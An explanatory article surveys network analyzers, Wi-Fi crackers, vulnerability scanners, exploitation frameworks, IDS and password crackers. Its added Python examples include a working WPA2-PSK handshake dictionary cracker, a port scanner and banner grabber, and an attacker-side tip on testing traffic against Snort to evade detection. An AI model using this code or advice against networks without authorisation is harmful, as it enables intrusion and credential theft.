Hacker toolkits are very similar to security toolkits. Both hackers and security experts strive to find vulnerabilities in networks and systems. The only differences between the two parties are their goals and the color of their hats.
There are thousands of tools and scripts that do very similar jobs. This article picks a few key areas, such as network analyzers, vulnerability scanners and password crackers, and discusses the most popular or outstanding candidate in each.
Possibly the single most important tool when evaluating a target network, whether for a security audit or an attack, is a network analyzer. A good network analyzer lets an attacker visualise and document the network: its segmentation, its address plan, the protocol layers and the encryption, if any. Sometimes a brief glance is enough to tell whether the network administrator is diligent in design and maintenance or whether the network is insecure.
When it comes to network analyzers, Wireshark is ages ahead of the competition. It is a fully functional, open-source, multi-protocol packet analyzer that runs on Windows, macOS and Linux. It captures live from the wire through libpcap (Npcap on Windows) and can save the capture to a file, or open a saved capture for offline analysis later.
Wireshark captures in promiscuous mode, so it sees every frame that reaches its interface; on a switched LAN that means connecting it to a SPAN (mirror) port, otherwise it only sees its own host's traffic and broadcasts. From a mirror port it can sniff all traffic for the LAN segment or subnet and present it per conversation, so following a particular TCP stream is a single click. It captures and displays in real time in a GUI, which is very helpful for seeing the network in action. By visualising the live data streams on a LAN segment, Wireshark makes it easy to pick out viruses and spyware that sweep the address space, or badly behaved infected machines trying to hijack the local DNS.
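As an added example (not code from this article or from the Wireshark project), the Python below reads a classic pcap file, the format Wireshark saves, and does programmatically what the paragraph describes doing by eye: it lists the hosts that sent bare TCP SYNs to many distinct addresses, the signature of a machine sweeping the address space. The capture it analyses is constructed inline (addresses, ports and the threshold are assumptions), so it runs offline; only the file and packet header layouts are the real ones.

```python
# Added example (not part of the original article or of Wireshark): a minimal
# pcap reader that does, offline, what the paragraph describes doing by eye in
# Wireshark: list the hosts that send TCP SYNs to many different addresses.
import struct
import ipaddress
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1


def _ipv4_tcp_syn(src: str, dst: str, dport: int, sport: int = 40000) -> bytes:
    """Build one Ethernet/IPv4/TCP SYN frame (constructed test traffic, checksums left zero)."""
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x02, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return eth + ip + tcp


def build_pcap(frames) -> bytes:
    """Serialise frames into the classic libpcap file format (what Wireshark saves)."""
    out = [struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)))
        out.append(frame)
    return b"".join(out)


def iter_frames(pcap: bytes):
    """Yield raw link-layer frames from a pcap byte string; handles both byte orders."""
    (magic,) = struct.unpack("<I", pcap[:4])
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype = struct.unpack(endian + "I", pcap[20:24])[0]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def syn_destinations(pcap: bytes):
    """Map each source IP to the set of destination IPs it sent a bare TCP SYN to."""
    seen = defaultdict(set)
    for frame in iter_frames(pcap):
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                      # not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6 or len(ip) < ihl + 14:
            continue                      # not TCP, or truncated
        flags = ip[ihl + 13]
        if flags & 0x12 == 0x02:          # SYN set, ACK clear: a new connection attempt
            src = str(ipaddress.IPv4Address(ip[12:16]))
            dst = str(ipaddress.IPv4Address(ip[16:20]))
            seen[src].add(dst)
    return seen


def find_sweepers(pcap: bytes, threshold: int = 10):
    """Hosts that opened connections to at least `threshold` distinct addresses."""
    return sorted(src for src, dsts in syn_destinations(pcap).items() if len(dsts) >= threshold)


# Constructed capture: one ordinary client and one host sweeping 10.0.0.1-30 on port 445.
SAMPLE_FRAMES = [_ipv4_tcp_syn("10.0.0.5", "10.0.0.1", 443),
                 _ipv4_tcp_syn("10.0.0.5", "10.0.0.2", 80)]
SAMPLE_FRAMES += [_ipv4_tcp_syn("10.0.0.66", f"10.0.0.{i}", 445) for i in range(1, 31)]
SAMPLE_PCAP = build_pcap(SAMPLE_FRAMES)

if __name__ == "__main__":
    print("address-sweep suspects:", find_sweepers(SAMPLE_PCAP))
```

The same heuristic is what Wireshark's Endpoints and Conversations statistics windows let you see at a glance: one source with dozens of peers and almost no completed streams. Tune the threshold to the segment; a DNS server or a monitoring host legitimately talks to many addresses, so the distinguishing feature is bare SYNs to hosts that never answer.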
Sometimes, though, gaining physical access to the wired network is not feasible. That is when switching the attack to Wi-Fi is the better route.
Aircrack-ng is a suite of programs for testing and cracking WEP and WPA/WPA2 802.11 a/b/g/n Wi-Fi networks. For WEP it has one of the best key-recovery attacks around, recovering the key statistically once it has gathered enough encrypted packets; for WPA/WPA2-PSK the attack is a dictionary attack against a captured four-way handshake, so it only succeeds if the passphrase is in the wordlist. The other modules cover capture (airodump-ng), analysis and packet injection (aireplay-ng).
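To make the WPA2 caveat concrete, here is an added example (not code from this article or from the Aircrack-ng project) of that dictionary attack in Python. The SSID, MAC addresses, nonces, EAPOL frame and "correct" passphrase are constructed assumptions; the PBKDF2 and PRF steps are the real 802.11i ones, which is why each candidate costs 4096 HMAC-SHA1 iterations and a wordlist is all that can realistically be tried.

```python
# Added example (not code from the original article or from the Aircrack-ng
# project): the dictionary attack aircrack-ng runs against a captured WPA2-PSK
# four-way handshake, reduced to its essentials.  The SSID, MAC addresses,
# nonces and EAPOL frame below are constructed, and the "real" passphrase is an
# assumption; only the key-derivation steps are the real 802.11i ones.
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # EAPOL-Key: 4-byte EAPOL header + 77 bytes of fields before the 16-byte MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF: PTK = PRF-384(PMK, "Pairwise key expansion", min/max(AA,SPA) || min/max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(3))            # 3 x 20 bytes covers the 48 bytes needed for CCMP
    return out[:48]                   # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (AES): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def make_handshake(passphrase: str) -> dict:
    """Constructed capture: what airodump-ng would save from message 2 of the handshake."""
    hs = {
        "ssid": "CorpWiFi-Test",
        "aa": bytes.fromhex("001122334455"),      # access point MAC (constructed)
        "spa": bytes.fromhex("66778899aabb"),     # client MAC (constructed)
        "anonce": bytes(range(32)),               # constructed nonces
        "snonce": bytes(range(32, 64)),
    }
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + struct.pack("!Q", 1)   # descr type, key info, key len, replay ctr
            + hs["snonce"] + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8     # nonce, IV, RSC, ID
            + b"\x00" * 16 + b"\x00\x00")                                # MIC placeholder, key data len
    frame = b"\x02\x03" + struct.pack("!H", len(body)) + body            # EAPOL v2, type Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, hs["ssid"]),
                     hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    mic = eapol_mic(kck, frame)
    hs["eapol"] = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return hs


def crack_psk(hs: dict, wordlist):
    """Try each candidate: PMK -> PTK -> KCK -> MIC; the one that reproduces the captured MIC wins."""
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, hs["ssid"]),
                         hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), captured_mic):
            return candidate
    return None


# Constructed handshake and a small wordlist; the passphrase is an assumption.
HANDSHAKE = make_handshake("correcthorse1")
WORDLIST = ["password", "letmein", "12345678", "correcthorse1", "CorpWiFi"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_psk(HANDSHAKE, WORDLIST))
```

Everything the attacker needs (SSID, both MACs, both nonces and the MIC) is sent in the clear in the handshake, so the only secret is the passphrase. The PBKDF2 step is what makes the attack slow, and the SSID acting as the salt is why precomputed tables only help for common network names.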
For an attacker, gaining access to the network is all very well, but the hosts, and particularly the servers, are the real targets. Once a target host has been identified, the attacker needs to evaluate its defences, and this is where a good, up-to-date vulnerability scanner comes into play.
When it comes to vulnerability scanners, Nessus is the most popular and flexible tool around. Nessus is not free: a licence is about $1.2k a year, which is still cheaper than many of its competitors. It ships with a huge library of vulnerability plug-ins (around 60k) as standard, and the paid edition gets real-time plug-in updates and an unlimited number of scans and IPs per scan. Nessus scans for missing or out-of-date security patches that leave a system open to known attacks, and it probes open ports and service versions, checking them against a large database of known issues and vendor security advisories. Patch checks are far more reliable when the scan is credentialed, that is, when Nessus can log in to the host and inspect installed packages instead of inferring versions from banners.
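As an added example (not code from this article or from Nessus), the Python below does the first two things a scanner does to a host: a TCP connect scan and a banner grab, followed by a version comparison against a baseline. It targets a constructed service on localhost so it runs offline; the banner and the baseline version are hypothetical, not taken from any real advisory.

```python
# Added example (not from the original article or from Nessus): the first two
# things a vulnerability scanner does to a host, a TCP connect scan and a banner
# grab, run against a constructed service on localhost so it works offline.
# The "baseline" version below is a hypothetical policy value, not a real advisory.
import re
import socket
import threading


def start_fake_service(banner: bytes) -> int:
    """Listen on an ephemeral localhost port and send `banner` to each client (constructed target)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def closed_port() -> int:
    """Pick a localhost port that nothing is listening on (bind, read the number, release it)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def grab_banner(host: str, port: int, timeout: float = 1.0):
    """Connect scan of one port: None if closed/filtered, "" if open but silent, else the banner."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(256).decode(errors="replace").strip()
            except socket.timeout:
                return ""          # open, but the server expects the client to speak first
    except OSError:
        return None


def scan(host: str, ports) -> dict:
    """Map each port to its banner (or None when closed), like a scanner's port-enumeration phase."""
    return {port: grab_banner(host, port) for port in ports}


def version_tuple(banner: str):
    """Last dotted number in a banner: 'SSH-2.0-OpenSSH_7.4p1' -> (7, 4), skipping the protocol version."""
    matches = re.findall(r"\d+(?:\.\d+)+", banner)
    if not matches:
        return None
    return tuple(int(part) for part in matches[-1].split("."))


def out_of_date(banner: str, baseline) -> bool:
    """True when the advertised version is older than `baseline` (a hypothetical patched version)."""
    ver = version_tuple(banner)
    return ver is not None and ver < tuple(baseline)


if __name__ == "__main__":
    port = start_fake_service(b"SSH-2.0-OpenSSH_7.4p1\r\n")
    for p, banner in scan("127.0.0.1", [port, closed_port()]).items():
        state = "closed" if banner is None else f"open  {banner!r}"
        flag = "  <- older than baseline 8.0" if banner and out_of_date(banner, (8, 0)) else ""
        print(f"{p:5d}  {state}{flag}")
```

This is the unauthenticated view: the version comes from whatever the service chooses to announce, and a vendor that backports fixes without bumping the version string will show up as vulnerable when it is not. That false-positive class is exactly what a credentialed scan removes.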
W3af is a very popular program for finding and exploiting weaknesses in web applications. The project's stated goal is to help secure the web by finding and exploiting every web application vulnerability. Described as a web application attack and audit framework, it comes with discovery, audit and exploitation plug-ins, which make it one of the most effective and flexible tools for attacking vulnerabilities and penetration-testing websites.
Once the attacker has identified a potential vulnerability, the next essential item in the toolkit is a good exploitation framework, used to launch pre-configured, tried and tested attacks against the target.
The open-source Metasploit Framework is the core: it ships with hundreds of prepared exploits, and hundreds more modules (auxiliary scanners, payloads, post-exploitation) plug into the extensible framework. The free Community edition wrapped that in a web interface with only basic features such as network discovery and limited import of scan data, while the Pro edition is aimed at penetration testing on networks of any size and adds features such as vulnerability validation with dynamic payloads, which are needed to get past intrusion prevention systems.
The problem for the attacker is that intrusion detection systems may be watching the wire for suspicious behaviour. If the attacker runs his own intrusion detector against his traffic first, he can see which of his actions go undetected and stay under the radar.
Snort is the open-source intrusion detection and prevention system for IP networks. It can detect thousands of worms, viruses and vulnerability scans, catches most suspicious behaviour, and has thousands of configurable attack signatures (rules) available, plus the option to write your own.
Once the attacker has focused on a potential victim and gained entry, the next step is to obtain administrative privileges. This is where a good password cracker comes in handy; it should not still work in this day and age, but it does.
Cain & Abel
Cain & Abel is a password recovery tool for Windows. It can sniff passwords and challenge-response exchanges off the network, crack hashed passwords with dictionary, brute-force and cryptanalysis (rainbow table) attacks, record VoIP calls and decode scrambled passwords. It has not been maintained for years, and modern crackers such as hashcat do the same job far faster, but the approach is unchanged.
Like security experts, hackers focus on system vulnerabilities. Whether you are a security expert or a hacker, a well-stocked toolkit prepares you for electronic warfare.